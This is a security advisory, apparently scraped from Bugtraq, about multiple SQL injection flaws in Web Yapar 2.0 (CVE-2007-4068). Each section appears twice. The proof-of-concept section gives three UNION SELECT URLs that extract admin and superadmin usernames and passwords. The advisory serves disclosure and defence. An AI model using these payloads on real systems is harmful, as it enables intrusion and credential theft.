Web Yapar Multiple SQL Injection Vulnerabilities
BID:25061
Info
Web Yapar Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 25061 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-4068 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 25 2007 12:00AM |
| Updated: | May 07 2015 05:36PM |
| Credit: | bypass is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
webyapar webyapar 2.0 |
| Not Vulnerable: | |
Discussion
Web Yapar Multiple SQL Injection Vulnerabilities
Web Yapar is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Web Yapar is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Web Yapar Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
Example URIs have been provided:
http://www.example.com/SCRIPT_PATH/?page=download&kat_id=-116+union+all+select+0,kullanici+from+admin
http://www.example.com/SCRIPT_PATH/?page=download&kat_id=-116+union+all+select+0,sifre+from+admin
http://www.example.com/SCRIPT_PATH/?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+superadmin
Attackers can use a browser to exploit these issues.
Example URIs have been provided:
http://www.example.com/SCRIPT_PATH/?page=download&kat_id=-116+union+all+select+0,kullanici+from+admin
http://www.example.com/SCRIPT_PATH/?page=download&kat_id=-116+union+all+select+0,sifre+from+admin
http://www.example.com/SCRIPT_PATH/?page=duyurular_detay&id=-50+union+all+select+0,kullanici,2,3,sifre,5+from+superadmin
Solution / Fix
Web Yapar Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].